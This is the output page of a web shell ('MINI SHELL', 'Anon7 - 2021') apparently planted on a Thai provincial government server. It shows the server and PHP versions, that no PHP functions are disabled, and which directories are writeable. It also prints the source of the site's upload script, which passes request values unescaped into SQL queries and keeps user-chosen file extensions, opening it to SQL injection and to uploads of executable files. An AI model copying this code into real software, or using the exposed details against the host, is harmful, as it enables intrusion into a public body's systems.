MINI SHELL

Server : Apache/2.2.2 (Fedora)
System : Linux App1.pathumtani.go.th 2.6.20-1.2320.fc5smp #1 SMP Tue Jun 12 19:40:16 EDT 2007 i686
User : apache ( 48)
PHP Version : 5.2.9
Disable Function : NONE
Directory :  /var/www/html/pathumthani_eoffice/application/bin/agenda_v1/fileupload/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/html/pathumthani_eoffice/application/bin/agenda_v1/fileupload/doajaxfileupload.php
<?php
header ("Content-Type: text/html; charset=tis-620");  
include("../../../config/config.inc.php");
			$error = "";
			$msg = "";
			$folder_file="../attach_file/";
			$file_name=$_FILES['fileToUpload']['name'];
			$idindex=(isset($_REQUEST['idindex']))?$_REQUEST['idindex']:"";
			$Fstatus=(isset($_REQUEST['Fstatus']))?$_REQUEST['Fstatus']:"";
			$desc=(isset($_REQUEST['desc']))?$_REQUEST['desc']:"";
			$chkedit=(isset($_REQUEST['chkedit']))?$_REQUEST['chkedit']:"";
			$arr_filename=explode(".",$file_name);		
			$tempname= GetRandomString(10).".".$arr_filename[1]  ;   
	
	switch ($Fstatus){
		case "ADD":       
	if($file_name!=""){
					$up_complate = @copy("$fileToUpload" ,  "$folder_file$tempname");    
					$strSQL = "INSERT INTO tbl_attach_file(id_attach_file,attach_file,comment,status_file)VALUES('$idindex','$tempname','$desc','Y')";
					$Query= mysql_db_query($dbname,$strSQL); 
		}
					break;
	case "EDIT":	
					
					if($file_name!=""){
									$strSQL = "select *  FROM  tbl_attach_file   WHERE  run_id='$chkedit'";
									$Query=mysql_db_query($dbname,$strSQL); 
									while ($row=mysql_fetch_array($Query)){
											@unlink($row['attach_file']);	
									}
						    $up_complate = @copy("$fileToUpload" ,  "$folder_file$tempname");    
							$strSQL = "UPDATE  tbl_attach_file SET  attach_file='$tempname',comment='$desc'  WHERE  run_id='$chkedit'";
					}else{
							$strSQL = "UPDATE  tbl_attach_file SET comment='$desc'  WHERE  run_id='$chkedit'";
						}
						$Query=mysql_db_query($dbname,$strSQL); 
				  break;
	case "DEL":
	if($chkedit!=""){	
	                        $strSQL = "select *  FROM  tbl_attach_file   WHERE  run_id='$chkedit'";
							$Query=mysql_db_query($dbname,$strSQL); 
								while ($row=mysql_fetch_array($Query)){
										@unlink($row['attach_file']);	
								}	                        
							$strSQL = "DELETE FROM  tbl_attach_file   WHERE  run_id='$chkedit'";
							$Query=mysql_db_query($dbname,$strSQL); 						    
			     break;
	}
	}

			
			$strSQLSelect = "select *  FROM  tbl_attach_file   WHERE  id_attach_file='$idindex'";           
			$Query=mysql_db_query($dbname,$strSQLSelect); 
			$strre="";
			while ($row=mysql_fetch_array($Query)){
				if(strlen($strre)>0){$strre.=",";}
				$strre.="{ ";
				$strre.="id:'".$row['run_id']."',desc:'".$row['comment']."',filename:'".$row['attach_file']."'";
				$strre.=" }";
				}				
			if (strlen($strre)>0){$strre=" [  ".$strre."  ] ";}	else{$strre="''";}
			echo "{";
			echo				"error: '" . $error . "',\n";
			echo				"msg:" . $strre. "";
			echo "}";	
	
function GetRandomString($length){      
	$template = "1234567890abcdefghijklmnopqrstuvwxyz";      
	settype($length, "integer");
	settype($rndstring, "string");
	settype($a, "integer");
	settype($b, "integer");      
		for ($a = 0; $a <= $length; $a++) {
		$b = mt_rand(0, strlen($template) - 1);
		$rndstring .= $template[$b];
	}       
	return $rndstring;
}	
?>

Anon7 - 2021